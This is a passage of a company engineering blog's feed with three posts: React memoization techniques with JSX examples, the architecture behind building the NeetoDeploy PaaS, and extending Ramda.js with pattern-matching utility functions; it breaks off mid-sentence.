src="/blog_images/2023/use-of-enable-load-relative-flag-in-building-ruby-binaries/passing-ruby-binary-image.png" alt="Successful Build"></p>]]></content>
    </entry><entry>
       <title><![CDATA[React performance optimization - memoization demystified]]></title>
       <author><name>Abhay V Ashokan</name></author>
      <link href="https://www.bigbinary.com/blog/react-performance-optimization-memoization-demystified"/>
      <updated>2023-06-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-performance-optimization-memoization-demystified</id>
      <content type="html"><![CDATA[<p>When it comes to building fast React applications, performance is a toppriority. Luckily, React has clever techniques built in that take care ofperformance optimizations automatically. In fact, React does most of the heavylifting for you, so you can focus on building your app without worrying too muchabout performance tweaks. However, as your React application scales and becomesmore complex, there are opportunities to further enhance its speed andefficiency.</p><p>In this blog, we will focus on how the memoization of components and proper codesplitting help you squeeze the most out of your application. We assume that youhave a high-level understanding of how<a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/usecallback-hook">useCallback</a>,<a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/react-memo">useMemo</a>,and<a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/react-memo">React.memo</a>works. If so, let's jump right in.</p><h3>Initial setup</h3><p>We'll go through the process of building a website that helps teams manage anddiscuss customer feedback. The application contains a dashboard where differentcategories of feedback are organized. The user can easily navigate between eachcategory and view all the feedback classified under it. It's important to notethat for the purpose of this blog, we will be focusing on building a dashboardprototype rather than a fully functional application, incorporating asignificant amount of demo data.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/customer-feedback-dashboard.gif" alt="Customer feedback dashboard"></p><p>The dashboard consists mainly of four components. The <code>Header</code> componentdisplays the category of feedback and also lets you easily navigate to othercategories. The <code>Category</code> component displays all the feedback related to theselected category. On the right side, the <code>Info</code> section provides personalizeddetails about the user who is currently logged in. All these parts areencapsulated in the <code>App</code> component, creating a cohesive dashboard.</p><p><strong>App.jsx</strong></p><p>The <code>App</code> component renders the <code>Header</code> and <code>Category</code> components correspondingto the selected category. For the sake of demonstration, we store all the dummydata in the <code>FEEDBACK_CATEGORIES</code> variable. By default, the first category isselected. We shall pass a <code>DEFAULT_USER</code> constant to render the <code>Info</code>component.</p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;import Category from &quot;./Category&quot;;import { DEFAULT_USER, FEEDBACK_CATEGORIES } from &quot;./constants&quot;;import Header from &quot;./Header&quot;;import Info from &quot;./Info&quot;;const App = () =&gt; {  const [selectedCategoryIndex, setSelectedCategoryIndex] = useState(0);  const totalCategories = FEEDBACK_CATEGORIES.length;  const category = FEEDBACK_CATEGORIES[selectedCategoryIndex];  const gotoNextCategory = () =&gt; {    setSelectedCategoryIndex(index =&gt; (index + 1) % totalCategories);  };  const gotoPrevCategory = () =&gt; {    setSelectedCategoryIndex(      index =&gt; (index + totalCategories - 1) % totalCategories    );  };  return (    &lt;div className=&quot;flex justify-between&quot;&gt;      &lt;div className=&quot;w-full&quot;&gt;        &lt;Header          gotoNextCategory={gotoNextCategory}          gotoPrevCategory={gotoPrevCategory}          title={category.title}        /&gt;        &lt;Category category={category} /&gt;      &lt;/div&gt;      &lt;Info user={DEFAULT_USER} /&gt;    &lt;/div&gt;  );};export default App;</code></pre><p><strong>Header.jsx</strong></p><p>The <code>Header</code> component renders the feedback title and implements pagination forseamless navigation between feedback.</p><pre><code class="language-jsx">import React from &quot;react&quot;;const Header = ({ title, gotoNextCategory, gotoPrevCategory }) =&gt; (  &lt;div className=&quot;flex justify-between p-4 shadow-sm&quot;&gt;    &lt;h1 className=&quot;text-xl font-bold&quot;&gt;{title}&lt;/h1&gt;    &lt;div className=&quot;space-x-2&quot;&gt;      &lt;button        className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;        onClick={gotoPrevCategory}      &gt;        Previous      &lt;/button&gt;      &lt;button        className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;        onClick={gotoNextCategory}      &gt;        Next      &lt;/button&gt;    &lt;/div&gt;  &lt;/div&gt;);export default Header;</code></pre><p><strong>Category.jsx</strong></p><p>The <code>Category</code> component displays a list of feedbacks based on selectedcategory, facilitating a bird's-eye view of all the feedbacks.</p><pre><code class="language-jsx">import React from &quot;react&quot;;const Category = ({ category }) =&gt; (  &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;    {category.feedbacks.map(({ id, user, description }) =&gt; (      &lt;div key={id} className=&quot;rounded shadow px-6 py-4 w-full&quot;&gt;        &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;        &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;      &lt;/div&gt;    ))}  &lt;/div&gt;);export default Category;</code></pre><p><strong>Info.jsx</strong></p><p>The <code>Info</code> component displays the information of the currently logged-in user.</p><pre><code class="language-jsx">import React from &quot;react&quot;;const Info = ({ user }) =&gt; (  &lt;div className=&quot;flex h-screen flex-col bg-gray-100 p-8&quot;&gt;    &lt;p&gt;{user.name}&lt;/p&gt;    &lt;p className=&quot;font-semibold text-blue-500&quot;&gt;{user.email}&lt;/p&gt;    &lt;button className=&quot;text-end mt-auto block text-sm font-semibold text-red-500&quot;&gt;      Log out    &lt;/button&gt;  &lt;/div&gt;);export default Info;</code></pre><p>Here is a<a href="https://codesandbox.io/s/react-performance-optimization-memoization-demystified-initial-xbu74g?file=/src/App.jsx">CodeSandbox link</a>for you to jump right in and try out all the changes yourselves.</p><h3>Profiling and optimizing with React profiler</h3><p>Now let's have a look at what the React Profiler has to say when we click on the&quot;Next&quot; and &quot;Previous&quot; buttons to navigate between the different feedbacks.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-initial-code.gif" alt="React profiler for initial code"></p><p>Clearly, every component is re-rendered whenever the user navigates to anotherfeedback. This is not ideal. We can argue that the <code>Info</code> component need not bere-rendered since the user information stays constant across every render. Letus wrap the default export of the <code>Info</code> component with <code>React.memo</code> and see howit improves the performance.</p><pre><code class="language-jsx">export default React.memo(Info);</code></pre><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-memoized-info.gif" alt="React profiler for memoized Info component"></p><p>It's now clear that subsequent renders use the cached version of the <code>Info</code>component boosting the overall performance.</p><p>Let's now explore how we can improve the performance of the <code>Header</code> componentfurther. There is no point in memoizing the <code>Header</code> component itself since the<code>title</code> is updated whenever we navigate to a new category. We can see that thepagination buttons need not re-render whenever we navigate to a new category.Hence, it is possible to extract these buttons into their own component andmemoize it to prevent these unnecessary re-renders.</p><p><strong>Header.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;import Pagination from &quot;./Pagination&quot;;const Header = ({ title, gotoNextCategory, gotoPrevCategory }) =&gt; (  &lt;div className=&quot;flex justify-between p-4 shadow-sm&quot;&gt;    &lt;h1 className=&quot;text-xl font-bold&quot;&gt;{title}&lt;/h1&gt;    &lt;div className=&quot;space-x-2&quot;&gt;      &lt;Pagination        gotoNextCategory={gotoNextCategory}        gotoPrevCategory={gotoPrevCategory}      /&gt;    &lt;/div&gt;  &lt;/div&gt;);export default Header;</code></pre><p><strong>Pagination.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;const Pagination = ({ gotoNextCategory, gotoPrevCategory }) =&gt; (  &lt;&gt;    &lt;button      className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;      onClick={gotoPrevCategory}    &gt;      Previous    &lt;/button&gt;    &lt;button      className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;      onClick={gotoNextCategory}    &gt;      Next    &lt;/button&gt;  &lt;/&gt;);export default React.memo(Pagination);</code></pre><p>This did not solve the problem. In fact, <code>React.memo</code> did not prevent anyunnecessary re-renders. By definition, <code>React.memo</code> lets you skip re-rendering acomponent when its props are unchanged. After close inspection, you willunderstand that the references to the <code>gotoNextCategory</code> and <code>gotoPrevCategory</code>functions get updated whenever the <code>App</code> component re-renders. This causes the<code>Pagination</code> component to re-render as well. Here we should use the<code>useCallback</code> hook to cache the function references before passing them asprops. This would maintain the referential equality of the functions acrossrenders and let <code>React.memo</code> does its magic.</p><p><strong>App.jsx</strong></p><pre><code class="language-jsx">// Rest of the codeconst App = () =&gt; {  // Rest of the code  const gotoNextCategory = useCallback(() =&gt; {    setSelectedCategoryIndex(index =&gt; (index + 1) % totalCategories);  }, []);  const gotoPrevCategory = useCallback(() =&gt; {    setSelectedCategoryIndex(      index =&gt; (index + totalCategories - 1) % totalCategories    );  }, []);  // Rest of the code};export default App;</code></pre><p>Now, you may use the profiler to verify that the <code>Pagination</code> component is notre-rendered unnecessarily.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-memoized-pagination.gif" alt="React profiler with memoized pagination"></p><p>Let us now introduce a new feature. The users should be able to filter thefeedback in a particular category based on a search term. We shall modify the<code>Category</code> component to incorporate it.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/feedback-search-feature.gif" alt="Feedback search feature"></p><p><strong>Category.jsx</strong></p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;const Category = ({ category }) =&gt; {  const [searchTerm, setSearchTerm] = useState(&quot;&quot;);  const filteredFeedbacks = category.feedbacks.filter(({ description }) =&gt;    description.toLowerCase().includes(searchTerm.toLowerCase().trim())  );  return (    &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;      &lt;input        autoFocus        className=&quot;outline-gray-200 w-full border p-2&quot;        placeholder=&quot;Search feedbacks&quot;        value={searchTerm}        onChange={e =&gt; setSearchTerm(e.target.value)}      /&gt;      {filteredFeedbacks.map(({ id, user, description }) =&gt; (        &lt;div key={id} className=&quot;rounded shadow px-6 py-4 w-full&quot;&gt;          &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;          &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;        &lt;/div&gt;      ))}    &lt;/div&gt;  );};export default Category;</code></pre><p>From the above code, it is very clear that the individual feedback need not bere-rendered every time the search term is updated. Hence, it would be a goodidea to extract it to a <code>Card</code> component and wrap it with React.memo.</p><p><strong>Category.jsx</strong></p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;import Card from &quot;./Card&quot;;const Category = ({ category }) =&gt; {  const [searchTerm, setSearchTerm] = useState(&quot;&quot;);  const filteredFeedbacks = category.feedbacks.filter(({ description }) =&gt;    description.toLowerCase().includes(searchTerm.toLowerCase().trim())  );  return (    &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;      &lt;input        autoFocus        className=&quot;outline-gray-200 w-full border p-2&quot;        placeholder=&quot;Search feedbacks&quot;        value={searchTerm}        onChange={e =&gt; setSearchTerm(e.target.value)}      /&gt;      {filteredFeedbacks.map(({ id, user, description }) =&gt; (        &lt;Card key={id} user={user} description={description} /&gt;      ))}    &lt;/div&gt;  );};export default Category;</code></pre><p><strong>Card.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;const Card = ({ user, description }) =&gt; (  &lt;div className=&quot;w-full rounded px-6 py-4 shadow&quot;&gt;    &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;    &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;  &lt;/div&gt;);export default React.memo(Card);</code></pre><p>If the number of feedback is too large, the calculation of <code>filteredFeedbacks</code>will become expensive. We need to traverse through all the comments one by oneand then perform a custom search logic on each comment object. We can use the<code>useMemo</code> hook to cache the results, preventing the same computation acrossrenders boosts the performance further.</p><p>Let us verify the React profiler one last time. Clearly, only the <code>Category</code>component re-renders with the new changes, taking the rest of the results fromthe cache.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-search-feature.gif" alt="React profiler useMemo and memoized Card"></p><p>To enhance the overall user experience, it's important to reset the search termwhenever users navigate to a new category. This can be easily achieved bypassing a <code>key</code> prop to the <code>Category</code> component. React will maintain separatecomponent trees for each category, ensuring that the search functionality startsanew in each category.</p><pre><code class="language-jsx">// Rest of the codeconst App = () =&gt; {  // Rest of the code  return (    &lt;div className=&quot;flex justify-between&quot;&gt;      &lt;div className=&quot;w-full&quot;&gt;        &lt;Header          title={feedback.title}          gotoNextCategory={gotoNextCategory}          gotoPrevCategory={gotoPrevCategory}        /&gt;        &lt;Category key={category.id} category={category} /&gt;      &lt;/div&gt;      &lt;Info user={DEFAULT_USER} /&gt;    &lt;/div&gt;  );};export default App;</code></pre><h3>Wrapping up</h3><p>By breaking down components and utilizing memoization, we have improved theperformance of our app significantly. The React Profiler has been instrumentalin identifying areas for optimization and validating the effectiveness of ourenhancements. With these techniques, you can now build faster and moreresponsive React applications. Apply these learnings to your projects andelevate your React development skills.</p><p>Here is a<a href="https://codesandbox.io/s/react-performance-optimization-memmoization-demystified-xef0q9">CodeSandbox link</a>of the optimized website for you to play with.</p>]]></content>
    </entry><entry>
       <title><![CDATA[NeetoDeploy: Zero to One]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one"/>
      <updated>2023-06-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/neeto-deploy-zero-to-one</id>
      <content type="html"><![CDATA[<p>This blog chronicles the exciting journey of how we built<a href="https://neeto.com/neetodeploy">NeetoDeploy</a>. It's a Heroku alternative. Westarted from absolute zero and built a fully functional PaaS product with almostall the features that Heroku offers on their review apps, with a team of 4developers in 2 months.</p><h2>How it all started</h2><p>At <a href="https://neeto.com">Neeto</a>, we are building<a href="https://blog.neeto.com/p/neeto-products-and-people">20+ products</a>simultaneously. All of these products had their production and stagingenvironments hosted on Heroku. In addition, pull requests from these productshad review apps deployed on Heroku. With an average of 5 open PRs at any timeper product, we are talking about 100+ live review apps, 20+ staging apps, and15+ production apps. Each one of these apps needed PostgreSQL, Redis, andElasticSearch instances, besides other requirements.</p><p>In August 2022, Heroku made this<a href="https://blog.heroku.com/next-chapter">announcement</a>.</p><blockquote><p>&quot;Starting November 28, 2022, we plan to stop offering free product plans andplan to start shutting down free dynos and data services.&quot;</p></blockquote><p>It meant that in 2 months, our monthly Heroku bill would skyrocket. At first, wetalked about switching to one of the Heroku alternatives.</p><blockquote><p>&quot;Every problem is an opportunity in disguise.&quot; - John Adams.</p></blockquote><p>And we thought - &quot;Why not build our own Heroku replacement?&quot;.</p><p><a href="https://bigbinary.com">BigBinary</a> has over 11 years of Ruby on Rails and Reactconsulting expertise. However, building a Heroku replacement, a complex TheDevOps-heavy project was way out of our comfort zone. With faith in ourengineering team and an exuberant spirit of youthful adventure, we embarked on ajourney in early September 2022 to build<a href="https://neeto.com/neetodeploy">NeetoDeploy</a>.</p><h2>The Journey</h2><p>We put together a team of 4 developers. We discussed technologies ranging fromCapistrano, Ansible, and AWS to Kubernetes. The more we talked, the more itbecame clear that no single technology could solve this problem. We needed acomplex system with multiple independent components that would interact togetherto handle the following core responsibilities:</p><ol><li>GitHub integration.</li><li>A build system that would identify the application's run-time dependencies,install them in the correct order, and build runnable machine images.</li><li>A scalable containerized environment that can run the pre-built machineimages.</li><li>A place to store the built machine images.</li><li>If the application needed a connection to external services (PostgreSQL,Redis, ElasticSearch, etc.), the ability to provision those on run-time.</li><li>A dashboard to view and manage the deployments.</li><li>Live logs.</li><li>Load balancing/routing.</li></ol><h2>The Architecture</h2><p>Once we understood the core functionality, we devised an architecture for thesystem. We then drew an architecture diagram depicting the different componentsand how they would interact with each other.</p><p><img src="/blog_images/2023/neeto-deploy-zero-to-one/neeto-deploy-arch.jpg" alt="NeetoDeploy - Architecture"></p><p>This diagram helped facilitate the rest of the discussions and our questionsregarding the project's feasibility. We looked at the diagram and saw for thefirst time that we could break up this complex beast into manageable pieces thatwe could build, test and deploy independently.</p><p>As per the plan, NeetoDeploy would comprise the following independentcomponents:</p><ol><li>Slug Compiler</li><li>Dyno Manager</li><li>Add-on Manager</li><li>The Compute Cluster - with the router and load balancer</li><li>Web Dashboard</li></ol><h2>The Slug Compiler</h2><p>This component would bundle the application code, its run-time dependencies(Ruby, Node, Ruby gems, NPM packages, third-party tools like ffmpeg, etc.), andthe operating system into a single image. We could then run this image on acontainer.</p><p>Using Docker to build the image was the first approach that we tried. Afteranalyzing the problem, we understood that we needed to generate a Dockerfile onthe fly. While working on this problem, we stumbled upon<a href="https://buildpacks.io/">Cloud Native Buildpacks</a>.</p><p>Their website said, &quot;transform your application source code into images that canrun on any cloud&quot;. This is precisely what we needed.</p><p>CNB(Cloud Native Buildpacks) system has three components:</p><ol><li>Stack</li><li>Builder</li><li>Buildpacks</li></ol><p>CNB provides <a href="https://github.com/buildpacks/pack">pack utility</a> that wouldaccept stack, builder, and buildpacks as parameters and build an OCI-compliantmachine image that works with existing Docker tooling and any broader containerecosystem like Kubernetes. In addition, Heroku had open-sourced their olderstacks and builders.</p><p>Now we had everything we needed to build runnable images. But we needed theability to build multiple images in parallel since NeetoDeploy would havevarious projects, and each project could have numerous deployments (appcorresponding to the main branch for staging/production and review apps for eachcommit in a pull request).</p><p>We built the initial version of Slug Compiler as a Ruby on Rails application,exposing API endpoints to start and stop a build. It would need a GitHubrepository URL to fetch the source code, a list of buildpacks, and a callbackURL as inputs. Once the image is successfully built, it will make a POST requestto the callback URL.</p><p>The slug compiler would spin up an EC2 machine for each build request. We made acustom AMI from an Ubuntu image with <code>pack</code> and other packages required for theCNB build system to run. Once the <code>pack</code> command builds the image, it will pushit to our Dockerhub account (Docker registry) and return the image URL via acallback. It would then kill the EC2 instance.</p><p>We found uploading the image to <a href="https://hub.docker.com">Dockerhub</a> very slow.So we set up a private Docker registry on<a href="https://aws.amazon.com/ecs/">AWS ECS</a>.</p><h2>The Add-on Manager</h2><p>Applications typically need access to a database, search service, cache service,etc. The Neeto products use PostgreSQL, Redis, and ElasticSearch. We decided tobuild the first version of the add-on manager to support these add-ons.</p><p>We built the add-on infrastructure using three big<a href="https://aws.amazon.com/ec2/">AWS EC2</a> boxes to keep things simple. Each machineran a PG, Redis, and ElasticSearch server, respectively. We made the add-onmanager as a Ruby on Rails API server, which would accept the add-on type asinput and return a connection URI with login credentials included. We wouldsupport only a fixed version of the add-ons in the initial version.</p><p>Upon receiving the request for a PG add-on, we will create a new database on thePG server with a unique username/password and return the connection string. ForRedis and ElasticSearch, we simulated separate connections using namespaces.</p><p>This add-on manager had some severe drawbacks since multiple applications sharedthe same add-on servers running on the same physical machine. Two of the biggestdrawbacks had to do with Security and Resource choking.</p><ol><li>Security: With some effort, it was possible to tamper with the data of otherapplications.</li><li>Resource choking: If one application uses more CPU and Memory, it blocks allother applications.</li></ol><p>Nevertheless, this throw-away version of the add-on manager was a good start.</p><h2>The Dyno manager and the compute cluster</h2><p>We needed a secure, scalable, containerized environment to run our pre-builtimages. <a href="https://kubernetes.io">Kubernetes</a> was the obvious answer. Kubernetes,also known as K8s, is an open-source system for automating deployment, scaling,and managing containerized applications. We created our cluster on<a href="https://aws.amazon.com/eks/">AWS EKS</a>.</p><p>Dyno manager was once again a Ruby on Rails API server app, which takes apre-built OCI image URL and a callback URL as inputs. It would then interfacewith the Kubernetes cluster using the<a href="https://kubernetes.io/docs/reference/kubectl/">kubectl CLI</a> to deploy the imageon the cluster.</p><p>Our first cluster was of fixed size. It had four nodes (EC2 machines).Kubernetes would deploy images to these machines and manage them. But thefixed-size cluster soon proved inadequate as we had more parallel deploymentsthan could be accommodated. So we set up cluster autoscaling.</p><h2>Load balancing and routing</h2><p>All applications hosted on NeetoDeploy are made publicly available on a_.neetoreviewapp.com subdomain. A public IP address is needed to set up a<a href="https://www.cloudflare.com/en-gb/learning/dns/dns-records/dns-cname-record/">DNS CNAME record</a>for _.neetoreviewapp.com. We provisioned an<a href="https://aws.amazon.com/elasticloadbalancing/">Elastic Load Balancer</a>, an AWScomponent with a public IP address. ELB is the component of our system that actsas the interface to the outside world.</p><p>We now needed to route the incoming web requests based on the subdomain to oneof the deployed applications, which required a programmable router. An<a href="https://docs.nginx.com/nginx-ingress-controller/">Nginx ingress controller</a>would meet this requirement. The Nginx ingress controller is essentially anNginx server set up as a reverse proxy with the redirect rules necessary.</p><h2>The Web Dashboard</h2><p>NeetoDeploy needed an admin user-facing web application that would perform thefollowing functions:</p><ol><li>Admin user login.</li><li>Initiate Github account integration.</li><li>Select a repo and create a project.</li><li>View and manage the deployments for a project.</li><li>Interact with other components (Slug compiler, dyno manager, and add-onmanager) to coordinate and orchestrate the functioning of the NeetoDeploysystem.</li><li>Maintain state like store project-specific environment variables, add-onconnection URLs, pre-built image URLs, etc.</li></ol><p>We built the Dashboard app using Ruby on Rails, React.js,<a href="https://blog.neeto.com/p/neetoui-is-the-ui-library-of-neeto">neetoUI</a>, andother integrations typical of any Neeto product.</p><h2>Live logging</h2><p>We needed to fetch and display two types of logs at run-time:</p><ul><li>Build and release logs.</li><li>Application logs.</li></ul><p>Fetching live logs from a remote machine and displaying them in the browser is acomplicated problem. We went with<a href="https://api.rubyonrails.org/classes/ActionController/Live/SSE.html">Server Side Events</a>(SSE) for the first version and streamed the logs directly to the browser.</p><ol><li>The dyno manager would tail <code>kubectl logs</code>.</li><li>STDOUT was continuously read and transmitted as server-side events.</li><li>The dyno manager sent the <code>app-logs-url</code> to the dashboard app via a callback.</li><li>Dashboard app had a log-display React component that streamed the SSE eventsusing the <code>app-logs-url</code> and displayed the live logs.</li></ol><h2>How it all came together</h2><ol><li>The Admin user signed up for a new account.</li><li>The admin logged in to the Dashboard app.</li><li>The GitHub account was connected by the admin.</li><li>The admin created a new project after selecting a GitHub repository.</li><li>The admin made a new Pull Request in the selected GitHub repository.</li><li>The dashboard app received the GitHub event for the new pull requestcreation.</li><li>The dashboard app requested the slug compiler to build an image for therepository using code corresponding to the pull request's latest commit. Italso sent the list of buildpacks to use.</li><li>The dashboard app also requested the add-on manager to create the necessaryadd-ons.</li><li>The dashboard app received the add-on URLs and saved them.</li><li>Slug compiler built the image, stored it on ECS and made a callback to thedashboard app with the image URL, and the dashboard app saved the image URL.</li><li>The dashboard app requested the dyno manager to deploy and start thenecessary web and worker processes after passing the image URL and add-onURLs as environment variables to set on the containers.</li><li>The Dyno manager talked to Kubernetes, completed the specified clusterdeployments and set up the necessary ingress rules.</li><li>The application is available for public access athttps://xyz.neetoreviewapp.com.</li></ol><h2>Roadmap</h2><p>We improved each component to make them scalable, secure and robust. We addedfeatures like CLI, performance metrics, continuous database backup, enabledcaching, reduced build time, horizontal scaling to support the increased load,platform extensibility with custom build packs, stabilized live logging with<a href="https://fluentbit.io/">Fluentbit</a> and more.</p><p>We migrated the review apps and staging environment of all<a href="https://neeto.com">neeto</a> products to NeetoDeploy. We also migrated productioninstances of most of our static websites. We are now gearing up to migrate theproduction instances of all the Neeto products. Exciting features like customplans for dynos, support for more add-on types, autoscaling to supportunexpected surges in traffic and more, are in the pipeline.</p><p>In the coming weeks and months, we will be writing more about the challenges wefaced and how we are building NeetoDeploy. Stay tuned for more.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Extending pure utility functions of Ramda.js]]></title>
       <author><name>Neenu Chacko</name></author>
      <link href="https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda"/>
      <updated>2023-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>At BigBinary, we are always looking to improve our code.<a href="https://ramdajs.com/docs/">Ramda</a>'s focus on functional-style programming withimmutable and side-effect-free functions aligns with this goal, making it ourpreferred choice.</p><p>While working on <a href="https://www.neeto.com/">neeto</a>, we found the need for specificfunctions that could be applied across a range of products but were not alreadyincluded in Ramda. We extended Ramda's functions to meet this need and createdour own pure utility functions.</p><p>In this blog, we'll explore our motivation for creating these functions and thebenefits they provide, showcasing how they can be generally applicable to a widerange of products.</p><h3>The matches function: the core of our pure utility functions</h3><p>During the development of Neeto, we encountered instances where long conditionalchains were used to search for objects with deeply nested properties.</p><p>For example, consider this <code>userOrder</code> object:</p><pre><code class="language-javascript">const userOrder = {  id: 12356,  user: {    id: 2345,    name: &quot;John Smith&quot;,    role: &quot;customer&quot;,    type: &quot;standard&quot;,    email: &quot;john@example.com&quot;,  },  amount: 25000,  type: &quot;prepaid&quot;,  status: &quot;dispatched&quot;,  shipTo: {    name: &quot;Bob Brown&quot;,    address: &quot;456 Oak Lane&quot;,    city: &quot;Pretendville&quot;,    state: &quot;Oregon&quot;,    zip: &quot;98999&quot;,  },};</code></pre><p>We can check if this order is deliverable like this.</p><pre><code class="language-javascript">const isDeliverable =  userOrder.type === &quot;prepaid&quot; &amp;&amp;  useOrder.user.role === &quot;customer&quot; &amp;&amp;  userOrder.status === &quot;dispatched&quot;;</code></pre><p>This approach works but it can be simplified.</p><p>Our goal was to simplify the process by focusing on <strong>comparing all the keys ofthe pattern to the corresponding keys in the data</strong>. If the pattern matches withthe object, the function should return true. With that in mind, we developed afunction named <code>matches</code> to determine if a given object matches a specifiedpattern.</p><p>With <code>matches</code> we should be able to rewrite <code>isDeliverable</code> as:</p><pre><code class="language-javascript">const isDeliverable = matches(DELIVERABLE_ORDER_PATTERN, userOrder);</code></pre><p>Here the <code>DELIVERABLE_ORDER_PATTERN</code> is defined as:</p><pre><code class="language-javascript">const DELIVERABLE_ORDER_PATTERN = {  type: &quot;prepaid&quot;,  status: &quot;dispatched&quot;,  user: { role: &quot;customer&quot; },};</code></pre><p>This is how we implemented the <code>matches</code> function:</p><pre><code class="language-javascript">const matches = (pattern, object) =&gt; {  if (object === pattern) return true;  if (isNil(pattern) || isNil(object)) return false;  if (typeof pattern !== &quot;object&quot;) return false;  return Object.entries(pattern).every(([key, value]) =&gt;    matches(value, object[key])  );};</code></pre><p>Here, we noticed a limitation in this implementation of the <code>matches</code> function.<strong>It compared the keys and values in the data and the pattern only for strictequality</strong>. We were not able to use the <code>matches</code> function for a situation likethe one mentioned below.</p><p>To check if the <code>userOrder</code> is being shipped to the city of <code>Michigan</code> or<code>Oregon</code>, we were not able to call <code>matches</code> function on the key <code>state</code>.Instead, we had to use the following approach along with other conditions.</p><pre><code class="language-javascript">const isToBeShippedToMichiganOrOregon =  [&quot;Michigan&quot;, &quot;Oregon&quot;].includes(userOrder.shipTo.state) &amp;&amp;  // other long chain of conditions</code></pre><p>To cover that, we decided to <strong>allow functions as key values in the patternobject</strong>. With this change, we should be able to write the same as thefollowing.</p><pre><code class="language-javascript">matches(  {    shipTo: { state: state =&gt; [&quot;Michigan&quot;, &quot;Oregon&quot;].includes(state) },    // ...other properties  },  userOrder);</code></pre><p>Here is the modification we have made to the <code>matches</code> function to accomplishthis feature:</p><pre><code class="language-javascript">const matches = (pattern, object) =&gt; {  if (object === pattern) return true;  if (typeof pattern === &quot;function&quot; &amp;&amp; pattern(object)) return true;  if (isNil(pattern) || isNil(object)) return false;  if (typeof pattern !== &quot;object&quot;) return false;  return Object.entries(pattern).every(([key, value]) =&gt;    matches(value, object[key])  );};</code></pre><p>As a result of these improvements, the <code>matches</code> function can now handle a widerrange of patterns.</p><pre><code class="language-javascript">const user = {  firstName: &quot;Oliver&quot;,  address: { city: &quot;Miami&quot;, phoneNumber: &quot;389791382&quot; },  cars: [{ brand: &quot;Ford&quot; }, { brand: &quot;Honda&quot; }],};matches({ cars: includes({ brand: &quot;Ford&quot; }) }, user); //truematches({ firstName: startsWith(&quot;O&quot;) }, user); // true</code></pre><p>Here, both <a href="https://ramdajs.com/docs/#includes">includes</a> and<a href="https://ramdajs.com/docs/#startsWith">startsWith</a> are methods from Ramda andthey are both curried functions. We will be talking about <code>currying</code> offunctions in the upcoming section.</p><h2>Neeto's pure utility functions for array operations</h2><p>With the help of the <code>matches</code> function, it became easier for us to work on ournext task at hand: building utility functions that simplify array operations.</p><h3>*By functions</h3><p>Let's say we have an array of users:</p><pre><code class="language-javascript">const users = [  {    id: 1,    name: &quot;Sam&quot;,    age: 20,    address: {      street: &quot;First street&quot;,      pin: 123456,      contact: {        phone: &quot;123-456-7890&quot;,        email: &quot;sam@example.com&quot;,      },    },  },  {    id: 2,    name: &quot;Oliver&quot;,    age: 40,    address: {      street: &quot;Second street&quot;,      pin: 654321,      contact: {        phone: &quot;987-654-3210&quot;,        email: &quot;oliver@example.com&quot;,      },    },  },];</code></pre><p>If we need to retrieve the details of user with the name <code>Sam</code>, we will do itlike this in plain vanilla JS:</p><pre><code class="language-javascript">const sam = users.find(user =&gt; user.name === &quot;Sam&quot;);</code></pre><p>Since we already have the <code>matches</code> function, we could easily create a utilityfunction that would return the same result as above while removing extra code.</p><p>That's how we came up with the <code>findBy</code> function that can be used to find thefirst item that matches the given pattern from an array.</p><p>We defined <code>findBy</code> like this:</p><pre><code class="language-javascript">const findBy = (pattern, array) =&gt; array.find(item =&gt; matches(pattern, item));</code></pre><p>Now we were able to rewrite our previous array operation as:</p><pre><code class="language-javascript">const sam = findBy({ name: &quot;Sam&quot; }, users);</code></pre><p>It was also now possible for us to write nested conditions like these:</p><pre><code class="language-javascript">findBy({ age: 40, address: { pin: 654321 } }, users);// returns details of the first user with age 40 whose pin is 654321findBy({ address: { contact: { email: &quot;sam@example.com&quot; } } }, users);// returns details of the first user whose contact email is &quot;sam@example.com&quot;</code></pre><p>We adopted the concept of<a href="https://javascript.info/currying-partials"><strong>currying</strong></a> from Ramda to shortenour function definitions and 